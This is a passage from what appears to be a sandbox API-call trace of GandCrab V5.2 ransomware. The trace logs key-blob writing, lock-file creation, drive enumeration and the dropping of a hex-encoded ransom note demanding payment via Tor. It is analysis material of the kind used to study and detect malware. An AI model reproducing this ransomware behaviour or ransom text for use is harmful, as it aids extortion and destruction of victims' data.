x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.440] WriteFile (in: hFile=0x214, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fcc4, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fcc4*=0x2162, lpOverlapped=0x0) returned 1 [0067.441] CloseHandle (hObject=0x214) returned 1 [0067.442] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.443] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.443] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x2f6)) [0067.443] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.443] GetWindowsDirectoryW (in: lpBuffer=0x25e0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.443] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x25e0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x25e0600, lpMaximumComponentLength=0x25e0608, lpFileSystemFlags=0x25e0604, lpFileSystemNameBuffer=0x25e0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e0600*=0xd2ca4def, lpMaximumComponentLength=0x25e0608*=0xff, lpFileSystemFlags=0x25e0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.444] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\d2ca4a09d2ca4deb61a.lock") returned 27 [0067.444] CreateFileW (lpFileName="C:\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x214 [0067.445] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.445] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.445] lstrlenW (lpString="C:\\") returned 3 [0067.445] lstrcatW (in: lpString1="C:\\", lpString2="*" | out: lpString1="C:\\*") returned="C:\\*" [0067.445] FindFirstFileExW (in: lpFileName="C:\\*", fInfoLevelId=0x1, lpFindFileData=0x259fce0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fce0) returned 0x4c9cf8 [0067.446] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0067.446] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0067.446] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0067.446] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0067.446] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.446] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.447] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.447] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.447] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\$Recycle.Bin\\\\TITWMVJL-DECRYPT.txt") returned 37 [0067.448] CreateFileW (lpFileName="C:\\$Recycle.Bin\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\$recycle.bin\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0067.449] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c